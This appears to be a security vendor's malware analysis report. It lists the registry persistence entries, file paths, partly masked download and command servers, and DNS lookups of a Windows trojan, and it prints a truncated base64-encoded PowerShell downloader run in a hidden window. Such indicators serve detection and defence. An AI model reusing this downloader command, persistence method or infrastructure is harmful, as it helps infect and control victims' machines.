Technical information
- [<HKLM>\System\CurrentControlSet\Services\wmsgapi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmsgapi] 'ImagePath' = '"%WINDIR%\SysWOW64\dmdskres\wmsgapi.exe"'
- 'wmsgapi' "%WINDIR%\SysWOW64\dmdskres\wmsgapi.exe"
- 'wmsgapi' %WINDIR%\SysWOW64\dmdskres\wmsgapi.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcA...
- %HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe
- %WINDIR%\syswow64\dmdskres\wmsgapi.exe
- %HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe to %WINDIR%\syswow64\dmdskres\wmsgapi.exe
- '76.##8.54.203':80
- http://do####bingfu.com/wp-includes/w/
- http://gi#####hanksdaily.com/Q/
- http://un####database.net/wp-admin/dhJ/
- http://76.##8.54.203/AMFO9/7OnOW4dU8SY0z2nLBr/zEoLnzCaetzK2mTymQa/OzkG/BtHP1VVvQM/C3gmKxie8u9ACFKwH/
- DNS ASK do####bingfu.com
- DNS ASK gi#####hanksdaily.com
- DNS ASK un####database.net
- '%HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe'
- '%WINDIR%\syswow64\dmdskres\wmsgapi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcA...' (with a hidden window)